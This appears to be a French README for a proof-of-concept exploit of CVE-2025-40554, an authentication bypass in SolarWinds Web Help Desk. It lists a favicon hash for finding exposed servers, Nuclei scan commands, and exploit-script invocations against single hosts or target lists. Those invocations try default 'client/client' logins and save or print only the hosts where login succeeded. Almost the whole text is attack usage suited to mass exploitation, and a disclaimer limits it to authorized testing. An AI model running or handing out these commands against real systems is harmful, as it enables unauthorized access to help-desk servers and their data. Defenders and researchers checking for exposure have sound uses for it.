
Exploit de preuve de concept pour CVE-2025-40554, un contournement d'authentification dans SolarWinds Web Help Desk. Inclut un modèle Nuclei et un exploit Python pour tester des cibles uniques ou multiples avec connexion par identifiants optionnelle.
http.favicon.hash:"1895809524"
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
pip install -r requirements.txt
Cible unique (contournement + connexion, client/client par défaut) :
python3 exploit_auth_bypass.py -t https://TARGET:8443
Cible unique avec identifiants personnalisés :
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass
Cible unique, contournement uniquement (sans connexion) :
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
Liste de cibles (enregistre uniquement vulnérable + connexion) :
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
Liste de cibles avec identifiants personnalisés :
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret
Mode silencieux (affiche uniquement les URL où la connexion a réussi) :
python3 exploit_auth_bypass.py -l result_all.txt -q
Ce PoC est destiné à la recherche et aux tests de sécurité autorisés uniquement. L'accès non autorisé à des systèmes informatiques est illégal. Les auteurs ne sont pas responsables d'une mauvaise utilisation.